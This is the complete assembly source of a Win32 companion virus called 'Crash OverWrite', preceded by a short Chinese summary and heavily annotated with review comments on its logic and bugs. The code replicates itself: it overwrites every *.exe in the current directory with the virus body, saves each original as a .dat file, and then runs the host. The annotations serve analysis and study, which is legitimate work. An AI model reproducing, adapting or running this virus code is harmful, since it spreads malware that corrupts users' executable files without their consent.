Win32.Crash.asm

博客展示了作者 BeLiAL 的首个 Win32 病毒 Crash OverWrite 的代码。该病毒是伴随型病毒：它只处理当前目录下匹配 *.exe 的文件，先把宿主复制为同名的 .dat 文件，再用自身覆盖原 .exe，遍历结束后通过 WinExec 启动改名为 .dat 的原宿主；无有效负载，作者自述对 DOS 文件感染效果不佳。代码中涉及文件查找、复制、读写等操作。
comment *

Name: Crash OverWrite :-)
Coder: BeLiAL
Type: Companion
Anything else: NO

This is my first win32 virus.Its only a
companionvirus but it does his work very
well.Its perhaps coded not so fine but
im sure nobody will care.It infects all
files in the directory and renames
the victimfile to .dat .Perhaps i will make
infecting more files...
Its without payload and any weapons :)
It Doesnt infect dos-files correctly.
Greetings to the whole #vx channel on undernet

BeLiAL
*

.386
.model flat
Locals
Jumps

Extrn FindFirstFileA :PROC
Extrn FindNextFileA :PROC
Extrn CreateFileA :PROC
Extrn WriteFile :PROC
Extrn ReadFile :PROC
Extrn GlobalAlloc :PROC
Extrn GlobalFree :PROC
Extrn ExitProcess :PROC
Extrn WinExec :PROC
Extrn CopyFileA :PROC
Extrn CloseHandle :PROC
Extrn SetFilePointer :PROC
Extrn GetFileSize :PROC

.data

; NOTE(review): Win32 defines MAX_PATH as 260; 0ffh (255) makes the
; WIN32_FIND_DATA declared below 5 bytes shorter than the OS layout.
MAX_PATH EQU 0ffh
FALSE EQU 0
; File offset inside the copied virus image that modify_victim overwrites with
; the victim's file name. Presumably the offset of the 'myname' string in the
; built executable -- cannot be confirmed from the source alone.
changeoffset EQU 094fh
; WinExec nCmdShow value used in that_was_all (1 = SW_SHOWNORMAL).
winsize EQU 01h

; Win32 FILETIME: 64-bit timestamp as two dwords. Only used to pad the
; WIN32_FIND_DATA layout below; no field is read by the code.
FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends

; Layout of WIN32_FIND_DATAA as assumed by this sample. With MAX_PATH = 0ffh
; (255) the struct is 313 bytes; the OS layout uses 260 for cFileName and is
; 318 bytes, so FindFirstFileA/FindNextFileA write 5 bytes past FindFileData
; (into memptr and the first byte of counter1 -- both are reassigned before
; they are read) and cAlternate does not line up with the OS field. cFileName
; (offset 44) does line up, and that is the only field the code walks.
WIN32_FIND_DATA struct
dwFileAttributes DWORD ?
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ? ; compared against 1000h as the "already infected" marker
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?) ; NUL-terminated match name, relative to cwd
cAlternate BYTE 0eh dup(?) ; 8.3 alias (cAlternateFileName); unused here
ends
FindFileData WIN32_FIND_DATA <> ; filled by FindFirstFileA/FindNextFileA
                                 ; (5 bytes shorter than the OS struct, see above)

memptr dd 0 ; pointer to the 1000h-byte GlobalAlloc buffer, set after ReadFile
counter1 dd 0 ; bytes-read / bytes-written out-parameter; never examined
filehandle dd 0 ; CreateFileA handle of the victim currently being patched
filesize dd 00001000h ; length read and written per victim; the same value is
                      ; the infection marker compared against nFileSizeLow
exefile db '*.exe',0 ; search pattern: current directory only
myname db 'crashoverwrite.exe',0 ; this copy's own file name; rewritten to
                                  ; ".dat" in reanimate before WinExec
dd 0 ; two zero dwords after myname; purpose not stated (possibly slack for a
dd 0 ; longer name patched in at changeoffset -- not verifiable here)
secbuffer dd 0 ; "<name>.dat" built by find_dot2. Only three zeroed dwords
dd 0 ; (12 bytes) separate it from searchhandle and the NUL is never copied,
dd 0 ; so a 12-byte name is unterminated and a longer one overwrites searchhandle
searchhandle dd 0 ; handle returned by FindFirstFileA (not validated)
db '[Crash OverWrite] coded by BeLiAL' ; author tag, no terminator

.code

; Entry point. Flat control flow (TASM 'Jumps' widens the short jumps as
; needed). Register use is ad hoc: eax/ebx/edx are reused across labels and
; nothing is preserved across the Win32 calls (stdcall; eax/ecx/edx volatile).
;
; Flow by label:
;   start             FindFirstFileA("*.exe") in the current directory
;   already_infected  skip a match whose low size dword is exactly 1000h
;   find_dot1..find_dot2  build "<name>.dat" in secbuffer from cFileName
;   next_step2        CopyFileA(<name>.exe -> <name>.dat), then
;                     CopyFileA(myname -> <name>.exe): host replaced by virus
;   open_victim..copy_to_file  read the first 1000h bytes of the new
;                     <name>.exe, store the victim's name at changeoffset,
;                     write the page back
;   reanimate         no more matches: rewrite myname's extension to .dat,
;                     WinExec it, ExitProcess(0)
start:
push offset FindFileData
push offset exefile
call FindFirstFileA ; FindFirstFileA("*.exe", &FindFileData)
mov searchhandle,eax ; not compared with INVALID_HANDLE_VALUE: with no match
                     ; the loop below runs on an unfilled FindFileData
already_infected:
mov eax,dword ptr nFileSizeLow.FindFileData
cmp eax,00001000h ; infection marker: size == 1000h (the value also used as
                  ; read/write length below); presumably the size of the virus
                  ; image -- not verifiable from the source
je find_next_victim
mov eax,offset cFileName.FindFileData
jmp find_dot1
find_next_victim:
push offset FindFileData
push searchhandle
call FindNextFileA ; FindNextFileA(searchhandle, &FindFileData)
test eax,eax
jz reanimate ; FALSE (no more *.exe, or error) -> launch the host
jmp already_infected
find_dot1:
; eax walks cFileName to the first '.'. No length bound; a name with more than
; one dot (a.b.exe) has its three bytes after the first dot patched instead
; of the extension.
cmp byte ptr ds:[eax],'.'
je next_step1
add eax,1
jmp find_dot1
next_step1:
add eax,1 ; eax -> first extension byte
push eax ; saved; used again below to restore the extension
; Overwrite the extension in place: exactly 3 bytes, terminator untouched.
; cFileName now reads "<name>.dat".
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
mov ebx,offset cFileName.FindFileData
mov eax,offset secbuffer
find_dot2:
; Copy cFileName ("<name>.dat") into secbuffer; ebx = src, eax = dst.
; Only dh is loaded but all of edx is compared with 0, so the loop exits only
; when the other bytes of edx are zero as well -- edx here holds whatever the
; preceding API call left in it. The NUL is not copied (the jump precedes the
; store); secbuffer relies on the zeroed dwords that follow it.
mov dh,byte ptr ds:[ebx]
cmp edx,0
je next_step2
mov byte ptr ds:[eax],dh
add ebx,1
add eax,1
jmp find_dot2
next_step2:
pop eax ; eax -> extension byte in cFileName again
push FALSE ; bFailIfExists
push offset secbuffer ; lpNewFileName = "<name>.dat"
; Restore ".exe" in cFileName while the first two arguments sit on the stack.
mov byte ptr ds:[eax],'e'
add eax,1
mov byte ptr ds:[eax],'x'
add eax,1
mov byte ptr ds:[eax],'e'
push offset cFileName.FindFileData ; lpExistingFileName = "<name>.exe"
call CopyFileA ; host preserved as <name>.dat; return value ignored
push FALSE ; bFailIfExists
push offset cFileName.FindFileData ; lpNewFileName = "<name>.exe"
push offset myname ; lpExistingFileName = this copy's own file
call CopyFileA ; victim overwritten with the virus body; return value ignored
open_victim:
push 0 ; hTemplateFile
push 080h ; FILE_ATTRIBUTE_NORMAL
push 3h ; OPEN_EXISTING
push 0h ; lpSecurityAttributes
push 0h ; dwShareMode = 0
push 0c0000000h ; GENERIC_READ | GENERIC_WRITE
push offset FindFileData.cFileName
Call CreateFileA ; open the freshly written <name>.exe
mov filehandle,eax
cmp eax,0ffffffffh ; INVALID_HANDLE_VALUE
je find_next_victim
getmemory:
push filesize ; dwBytes = 1000h
push 0 ; uFlags = GMEM_FIXED
Call GlobalAlloc ;get the memory
mov edx,eax
cmp eax,0
je close_file ; allocation failed: close the victim and move on
push edx ; edx is volatile across ReadFile; keep the buffer pointer
copyinmemory:
push 0 ; lpOverlapped
push offset counter1 ; lpNumberOfBytesRead
push filesize ; nNumberOfBytesToRead = 1000h
push edx ; lpBuffer
push filehandle
Call ReadFile ; neither the return value nor counter1 is examined
pop edx
mov dword ptr memptr,edx ;for later use
add edx,changeoffset ; edx -> buffer + 094fh, the slot that receives the name
mov eax,offset cFileName.FindFileData
modify_victim:
; strcpy(buffer + changeoffset, cFileName), NUL included, so the new copy
; carries its own file name for its later 'reanimate' step. Clobbers ebx.
mov bh,byte ptr ds:[eax]
mov byte ptr ds:[edx],bh
cmp bh,0
je set_pointer
add eax,1
add edx,1
jmp modify_victim
set_pointer:
push 0 ; dwMoveMethod = FILE_BEGIN
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
push filehandle
call SetFilePointer ; rewind to offset 0
copy_to_file:
push 0 ; lpOverlapped
push offset counter1 ; lpNumberOfBytesWritten
push filesize ; always 1000h, even if ReadFile returned fewer bytes
push memptr
push filehandle
call WriteFile ; write the patched first page back; return value ignored
close_file:
push filehandle
call CloseHandle
; The GlobalAlloc buffer is never released (GlobalFree is declared, unused).
jmp find_next_victim
reanimate:
; Search exhausted: turn myname ("<self>.exe") into "<self>.dat" and run it.
mov eax,offset myname
find_dot3:
mov bx,word ptr ds:[eax]
cmp bx,'e.' ; word compare matches the byte pair ".e" (little-endian)
je next_step3
cmp bx,'E.' ; ...or ".E"
je next_step3
add eax,1
jmp find_dot3
next_step3:
add eax,1 ; eax -> first extension byte
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
add eax,1
mov byte ptr ds:[eax],00h ; terminator written explicitly here
that_was_all:
push winsize ; nCmdShow = SW_SHOWNORMAL
push offset myname
call WinExec ; run the original host saved as .dat; return value ignored
final:
push 0
call ExitProcess

ends
end start
